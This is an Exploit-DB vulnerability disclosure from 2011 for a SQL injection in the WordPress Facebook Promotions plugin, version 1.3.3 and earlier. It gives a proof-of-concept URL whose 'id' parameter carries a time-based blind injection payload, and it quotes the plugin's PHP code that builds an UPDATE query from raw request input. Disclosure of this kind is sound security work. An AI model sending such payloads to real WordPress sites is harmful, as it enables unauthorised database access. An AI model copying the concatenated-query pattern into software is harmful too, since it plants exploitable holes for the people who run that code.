WordPress Plugin Facebook Promotions 1.3.3 - SQL Injection

EDB-ID:

17737

CVE:

N/A


Platform:

PHP

Published:

2011-08-28

# Exploit Title: WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vulnerability
# Date: 2011-08-28
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/fbpromotions.1.3.3.zip
# Version: 1.3.3 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/fbpromotions/fbActivate.php?action=activate&name=test&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if($_REQUEST['action']=="activate"){
    $key = md5(get_option("key").$_REQUEST['name'].$_REQUEST['id']);
    ...
    $sql = "UPDATE fb_promotions SET `landing_order`=1,`activation_key`='".$key."' WHERE promo_id='".$_REQUEST['id']."'";